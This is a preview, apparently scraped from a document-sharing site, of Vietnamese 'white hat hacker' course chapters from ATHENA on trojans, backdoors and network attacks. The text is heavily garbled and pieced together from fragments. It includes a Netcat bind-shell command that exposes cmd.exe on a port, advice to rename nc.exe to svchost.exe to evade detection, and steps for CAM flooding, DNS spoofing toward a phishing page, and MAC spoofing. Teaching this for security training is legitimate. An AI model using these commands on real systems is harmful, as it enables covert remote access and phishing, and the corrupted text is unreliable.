Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 40 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
40
Dung lượng
4,69 MB
Nội dung
www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA CHAPTER 6: TROJAN AND BACKDOOR I. Trojan và backdoor : - Trojan horse l chương trnh my tnh thưng đưc n dưi cc chương trnh khc, c cha code n đưc vit đ khai thc lỗ hổ ng hoặ c gây nguy hạ i cho hệ điề u hà nh, ch yu dng đ ăn cp cc thông tin nhy cm như password account,file - Backdoor là chương trì nh to kt ni t xa. Hacker thườ ng sử dụ ng để kế t nố i lấ y file hoặ c điề u khiể n tớ i má y củ a nạ n nhân m c th bypass qu trnh authentication.Hacker thưng ci đt trên my ca nn nhân đ d dng kt ni cho lầ n xâm nhậ p sau. - Spyware chương trì nh thu thậ p thông tin về user , hot đng ngm đ thu thp v cc hot đng ca ngưi dng. Kế t hợ p vớ i Adware để quả ng cá o (pop-up) cho cá c site thương mạ i - Điề u kiệ n cầ n củ a Trojan và Backdoor: + Phi c trên my ca victim(ci đặ t hoặ c copy và o má y victim) - Trojan-backdoor thườ ng đượ c nhú ng phầ n server.exe trong cá c chương trì nh hợ p lệ đ la nn nhân v hacker s dng phn client đ to kt ni ti nn nhân khi nn nhân online. - Rấ t dễ tạ o Trojan từ cá c tool kit có rấ t nhiề u trên Internet như Stealth,Beat II. Cc kiu Trojan-Backdoor : - Trojan thườ ng có mộ t hoặ c nhiề u tí nh năng : + Remote connect Access : kế t nố i và điề u khiể n từ xa + Sending data : gử i file giữ a hacker và victim + Destructive and DoS : ph hy file hoc my v DoS + Security software disable : tắ t firewall,antivirus software để dễ dà ng kế t nố i III. Cch phng chng : - Sử dụ ng cá c phầ n mề m Trojan detection,antivirus update thườ ng xuyên - Kế t hợ p cá c biệ n phá p IDS để phá t hiệ n Trojan - Thườ ng xuyên kiể m tra cá c port mở trên má y www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA IV. Lab : 1. Netcat: l trojan backdoor đơn giả n nhưng hữ u hiệ u download tạ i : http://netcat.sourceforge.net/download.php . Netcat chạ y đượ c trên Windows và Linux a. Trên Windows : không cầ n cà i đặ t,chy trên command-line b. Trên Linux : - Gii nn v ci đt vi lnh tar,./configure,make www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA - Cc option ca Netcat : www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA - Chy Netcat trên Windows : + nc –l –p 12345 –d –e cmd.exe –L : > -l: chuyn sang ch đ lng nghe,> -p 12345 : lng nghe trên port 12345, > -d : chy độ c lậ p không cầ n console(command-line console), > -e cmd.exe : gi cmd.exe khi kế t nố i, > -L : tự độ ng chạ y lạ i mỗ i khi kế t thú c vớ i cù ng cá c lnh như trưc. www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA - To kt ni t my linux : nc IP(my cầ n kế t nố i) port(lắ ng nghe) www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA - Hacker có thể rename nc.exe thà nh svchost.exe để lừ a như 1 process củ a hệ thố ng và lắ ng nghe trên cá c common port để trá nh bị phá t hiệ n www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn Tel : (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA [...]... (08) 38244041 – 090 78 79 477 - Chọn file EthrDrv.inf đê cai : ̉ ̀ - Chạy Etherflood từ command-line đê băt đâu flood mang : ̉ ́ ̀ ̣ Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Analyst băng Wireshark ta thây Etherflood gưi khoang 450.000 trong khoang 66 s ̀ ́ ̉ ̉ ̉ vơi môi packet... 477 Check IP cua Yahoo trươc khi bị DNSspoofing ta thây yahoo có IP là 66 .94.234.13 ̉ ́ ́ Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 Dùng DNSspoof để tạo gói tin DNS giả IP của yahoo thành 192. 168 .2.12 , tại IP này có thể đặt trang Yahoo giả làm web fishing hoặc... www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Trên Windows phân lơn card mang đêu hô trơ thay MAC address trong phân ̀ ́ ̣ ̀ ̃ ̣ ̀ Properties Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Mơ Properties cua NIC.Chọn Configure ̉ ̉ - Chọn Tab Advanced Check vao Value nhâp vao gia... ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Câu hì nh range IP như y muôn : ́ ́ ́ Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Tab Reservations cho phep câu hì nh cho chí nh xac tưng client ́ ́ ́ ̀ - Tab Active Lease cho biêt Client nao đang nhân IP ́ ̀ ̣ Chương... Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Chọn Install/Protocol Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Chọn Have Disk và browse tới folder Etherflood Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng... ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Tại máy thứ 2 mơ trì nh duyêt va truy câp tơi www.google.com.vn và gõ vào phần ̉ ̣ ̀ ̣ ́ tìm kiếm “athenavn” Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Trơ vê may 1 ta thây : ̉ ̀ ́ ́ Chương 7: Tài liệu học an...www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 - Wireshark co thê rebuild lai câu truc cua connection data tư đo loc lai thông tin ́ ̉ ̣ ́ ́ ̉ ̀ ́ ̣ Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 2 HTTP sniffer: Sniffer va rebuild HTTP connection ̀ - Sau khi cai đăt tai may 1 và mơ trương... destination tư ́ ̀ ̃ ́ ́ ̀ đo biêt port nao cân forward goi tin ́ ́ ̀ ̀ ́ - Vì CAM table có giới hạn về size và thông thương khi CAM table bị đây switch se ̀ ̀ ̃ chuyên sang chê đô forward goi tin tơi tât ca cac port switch trơ thanh giông môi ̉ ́ ̣ ́ ́ ́ ̉ ́ ̉ ̀ ́ trương hub dê dang cho Hacker sniff đương truyên ̀ ̃ ̀ ̀ ̀ - Etherflood la tool co thê tao hang loat cac packet vơi MAC source va... ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 5 Đổi MAC trên Windows và Linux để bypass các MAC filter - Trên Linux : + ifconfig eth0 hw ether 00:11:22:33:44:55(MAC muôn thay) ́ Chương 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn... 7: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA www.Athena.Edu.Vn – Tel : (08) 38244041 – 090 78 79 477 4 Etherflood: flood switched network tool - Trong môi trương switched Network,các switch forward các gói tin chính xác từ ̀ máy source tới máy destination nhờ vào bảng Content Addressable Memory(CAM table) trong đo chưa MAC address . (08)38244041 - 090 78 79 477 Chương 6: Tài liệu học an ninh mạng – Hacker Mũ Trắng – Trung tâm đào tạo quản trị mạng & an ninh mạng ATHENA CHAPTER 6: TROJAN AND BACKDOOR I. Trojan và backdoor. cho cá c site thương mạ i - Điề u kiệ n cầ n củ a Trojan và Backdoor: + Phi c trên my ca victim(ci đặ t hoặ c copy và o má y victim) - Trojan- backdoor thườ ng đượ c nhú. nn nhân khi nn nhân online. - Rấ t dễ tạ o Trojan từ cá c tool kit có rấ t nhiề u trên Internet như Stealth,Beat II. Cc kiu Trojan- Backdoor : - Trojan thườ ng có mộ t hoặ c